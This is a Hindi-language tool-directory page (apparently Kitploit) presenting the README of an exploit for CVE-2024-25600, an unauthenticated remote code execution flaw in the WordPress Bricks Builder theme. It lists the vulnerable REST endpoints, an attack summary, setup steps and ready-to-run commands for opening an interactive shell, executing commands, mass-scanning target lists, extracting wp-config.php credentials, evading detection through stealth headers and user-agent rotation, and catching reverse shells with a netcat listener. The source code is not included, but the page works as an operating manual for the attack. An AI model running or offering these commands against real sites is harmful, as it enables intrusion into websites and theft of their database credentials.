Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
WP-Bricks-Exploit-CVE-2024-25600 — CVE-2024-25600 - WordPress Bricks Builder थीम के लिए बिना प्रमाणीकरण वाला RCE एक्सप्लॉइट। उन्नत शोषण ढांचा जिसमें इंटरैक्टिव शेल, रिवर्स शेल, फ़ाइल अपलोड/डाउनलोड, एसिंक्रोनस स्कैनिंग, स्टील्थ मोड, प्रॉक्सी समर्थन, और मल्टी-थ्रेडेड भेद्यता स्कैनिंग शामिल है। केवल अधिकृत सुरक्षा परीक्षण के लिए। | Kitploit
उपकरण/GitHubGitHub/cerberusmrxi/wp-bricks-exploit-cve-2024-25600
टोहीभेद्यता स्कैनरशोषणशेलकोडवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
पेलोड डेवलपमेंट
GitHubcerberusmrxi/wp-bricks-exploit-cve-2024-25600

WP-Bricks-Exploit-CVE-2024-25600

रिपॉजिटरी देखें
1162 महीने पहलेअभी तक समीक्षित नहीं

विवरण

CVE-2024-25600 - WordPress Bricks Builder थीम के लिए बिना प्रमाणीकरण वाला RCE एक्सप्लॉइट। उन्नत शोषण ढांचा जिसमें इंटरैक्टिव शेल, रिवर्स शेल, फ़ाइल अपलोड/डाउनलोड, एसिंक्रोनस स्कैनिंग, स्टील्थ मोड, प्रॉक्सी समर्थन, और मल्टी-थ्रेडेड भेद्यता स्कैनिंग शामिल है। केवल अधिकृत सुरक्षा परीक्षण के लिए।

साझा करें

BricksRCE एक्सप्लॉइटर

CVE-2024-25600 — WordPress Bricks Builder अनप्रमाणित RCE

Python Version CVSS CVE License Platform

CVE-2024-25600 के लिए अधिकृत सुरक्षा मूल्यांकन उपकरण
लेखक: सुदीपा वानिगरथना · उपकरण: BricksRCE एक्सप्लॉइटर v1.0
मुख्य स्क्रिप्ट: cve-2024-25600.py

b

[!IMPORTANT] केवल अधिकृत उपयोग। यह उपकरण सुरक्षा अनुसंधान, शिक्षा, और उन प्रणालियों के परीक्षण के लिए है जिनके आप स्वामी हैं या जिनके लिए आपके पास स्पष्ट लिखित अनुमति है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। लेखक दुरुपयोग से उत्पन्न किसी भी देयता को स्वीकार नहीं करता है।


विषय-सूची

  • अवलोकन
  • कमजोरी विवरण
  • विशेषताएँ
  • स्थापना
  • त्वरित प्रारंभ
  • उपयोग गाइड
  • कमांड संदर्भ
  • इंटरैक्टिव शेल
  • आउटपुट और लॉगिंग
  • समस्या निवारण
  • रिपॉजिटरी संरचना
  • संस्करण इतिहास
  • अस्वीकरण
  • लेखक और श्रेय
  • लाइसेंस

अवलोकन

CVE-2024-25600 WordPress Bricks Builder थीम में एक गंभीर, अनप्रमाणित दूरस्थ कोड निष्पादन कमजोरी है। render_element REST एंडपॉइंट में उपयोगकर्ता-नियंत्रित इनपुट के अनुचित हैंडलिंग के कारण, अनप्रमाणित हमलावर प्रभावित इंस्टॉलेशन पर मनमाना PHP/सिस्टम कमांड निष्पादित कर सकते हैं।

BricksRCE एक्सप्लॉइटर (cve-2024-25600.py) अधिकृत सुरक्षा पेशेवरों के लिए एक पूर्ण-विशेषताओं वाला Python मूल्यांकन उपकरण है, जो:

  • कमजोर Bricks Builder इंस्टॉलेशन का पता लगाए
  • नियंत्रित कमांड निष्पादन के साथ प्रभाव की पुष्टि करे
  • इंटरैक्टिव शेल के माध्यम से समझौता किए गए होस्ट के साथ संवाद करे
  • एसिंक/थ्रेडेड वर्कर्स के साथ लक्ष्य सूचियों का बड़े पैमाने पर स्कैन करे
  • रिपोर्टिंग के लिए संरचित परिणाम निर्यात करे

कमजोरी विवरण

विशेषतामान
CVE IDCVE-2024-25600
CVSS9.8 (गंभीर)
हमला वेक्टरनेटवर्क — अनप्रमाणित
प्रभावपूर्ण दूरस्थ कोड निष्पादन, गोपनीयता / अखंडता / उपलब्धता से समझौता
प्रभावित उत्पादWordPress Bricks Builder थीम
प्रभावित संस्करणBricks ≤ 1.9.6 (1.9.6.1+ में पैच किया गया)
कमजोरी प्रकारअनप्रमाणित दूरस्थ कोड निष्पादन
CWECWE-94 (कोड उत्पादन का अनुचित नियंत्रण)

प्रभावित एंडपॉइंट

एंडपॉइंटविधि
/wp-json/bricks/v1/render_elementPOST
/?rest_route=/bricks/v1/render_elementPOST

हमला सारांश

  1. लक्ष्य पेज स्रोत से एक Bricks nonce निकालें
  2. एक दुर्भावनापूर्ण तत्व पेलोड के साथ रचित render_element अनुरोध सबमिट करें
  3. सर्वर-साइड कोड मूल्यांकन मनमाना कमांड निष्पादन की ओर ले जाता है

संदर्भ

  • CVE-2024-25600 (MITRE)
  • NVD प्रविष्टि
  • Bricks Builder चेंजलॉग / सुरक्षा सलाह

विशेषताएँ

मुख्य क्षमताएँ

क्षमताविवरण
कमजोरी का पता लगानानियंत्रित मार्कर-आधारित जांच के माध्यम से RCE की पुष्टि
Nonce निष्कर्षणबहु-विधि nonce खोज (स्क्रिप्ट, पेज स्रोत, मेटा, REST)
संस्करण का पता लगानाCSS / readme / REST से Bricks Builder संस्करण की पहचान
इंटरैक्टिव शेलइतिहास, ऑटोकम्प्लीट और फ़ाइल स्थानांतरण के साथ पूर्ण REPL
एकल-कमांड मोडएक कमांड निष्पादित करें और बाहर निकलें (स्क्रिप्टिंग के अनुकूल)
रिवर्स शेल सहायकbash / nc / Python / PHP / Perl / Ruby रिवर्स शेल उत्पन्न करें
wp-config निष्कर्षणwp-config.php का पता लगाने और पढ़ने का प्रयास
बड़े पैमाने पर स्कैनिंगURL सूची से एसिंक या थ्रेडेड बहु-लक्ष्य स्कैनिंग

परिचालन नियंत्रण

क्षमताविवरण
दर सीमित करनाअनुरोधों के बीच कॉन्फ़िगर करने योग्य विलंब
पुनर्प्रयास तर्कटाइमआउट और कनेक्शन त्रुटियों पर एक्सपोनेंशियल बैकऑफ़
User-Agent रोटेशनप्रति अनुरोध यादृच्छिक ब्राउज़र फ़िंगरप्रिंट
स्टील्थ मोडयादृच्छिक Accept-Language / Accept-Encoding हेडर
प्रॉक्सी समर्थनHTTP, HTTPS, SOCKS5 / SOCKS5h
दोहरे एंडपॉइंटwp-json, rest_route, या दोनों को प्राथमिकता दें
फ़ोर्स मोडप्री-चेक छोड़ें और सीधे शोषण का प्रयास करें
समृद्ध CLIRich के माध्यम से प्रोग्रेस बार, टेबल और रंगीन पैनल

रिपोर्टिंग

क्षमताविवरण
JSON / TXT निर्यातस्कैन परिणाम और कमजोर लक्ष्य सहेजें
कमांड इतिहासनिष्पादित कमांड का वैकल्पिक लॉगिंग
फ़ाइल लॉगिंगस्थायी bricks_rce.log और कस्टम लॉग पथ

स्थापना

आवश्यक शर्तें

  • Python 3.8+
  • pip
  • अधिकृत लक्ष्य(ों) तक नेटवर्क पहुँच

सेटअप

git clone https://github.com/CerberusMrXi/WP-Bricks-Exploit-CVE-2024-25600.git
cd WP-Bricks-Exploit-CVE-2024-25600

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 cve-2024-25600.py --help

निर्भरताएँ

requests>=2.31.0
aiohttp>=3.9.0
beautifulsoup4>=4.12.0
lxml>=4.9.0
prompt-toolkit>=3.0.0
rich>=13.7.0
pysocks>=1.7.0          # वैकल्पिक — SOCKS5 प्रॉक्सी समर्थन

त्वरित प्रारंभ

https://target.example को केवल प्रयोगशाला या अधिकृत लक्ष्य से बदलें।

# इंटरैक्टिव शेल
python3 cve-2024-25600.py -u https://target.example

# एकल कमांड
python3 cve-2024-25600.py -u https://target.example --cmd "id"

# बड़े पैमाने पर स्कैन
python3 cve-2024-25600.py -f targets.txt -t 20 -o results.json

# संस्करण पता लगाना
python3 cve-2024-25600.py -u https://target.example --detect-version

# Burp प्रॉक्सी के माध्यम से
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v

उपयोग गाइड

सभी उदाहरण मुख्य स्क्रिप्ट cve-2024-25600.py का उपयोग करते हैं

1. सहायता दिखाएँ

python3 cve-2024-25600.py --help

2. एकल-लक्ष्य इंटरैक्टिव शेल

लक्ष्य के कमजोर होने की पुष्टि के बाद एक इंटरैक्टिव RCE शेल खोलता है।

python3 cve-2024-25600.py -u https://target.example

कार्यप्रवाह:

  1. URL को सामान्यीकृत और मान्य करें
  2. पेज से nonce निकालें
  3. कमजोरी सत्यापित करें (जब तक --force न हो)
  4. इंटरैक्टिव शेल में प्रवेश करें

3. एकल कमांड निष्पादित करें

python3 cve-2024-25600.py -u https://target.example --cmd "whoami"

कमांड आउटपुट को फ़ाइल में सहेजें:

python3 cve-2024-25600.py -u https://target.example --cmd "id" --save-output

4. पेलोड प्रकार चुनें

# डिफ़ॉल्ट PHP अपवाद-आधारित पेलोड
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload php

# system() आधारित पेलोड
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload system

5. Bricks Builder संस्करण का पता लगाएँ

python3 cve-2024-25600.py -u https://target.example --detect-version

कमांड के साथ संयोजित करें:

python3 cve-2024-25600.py -u https://target.example --detect-version --cmd "id"

6. wp-config.php निकालें

python3 cve-2024-25600.py -u https://target.example --extract-wp-config

सफलता पर wp-config_<target>.txt के रूप में सहेजा जाता है।

7. रिवर्स शेल (केवल अधिकृत प्रयोगशाला)

# टर्मिनल 1 — श्रोता
nc -lvnp 4444
टूल डाउनलोड करें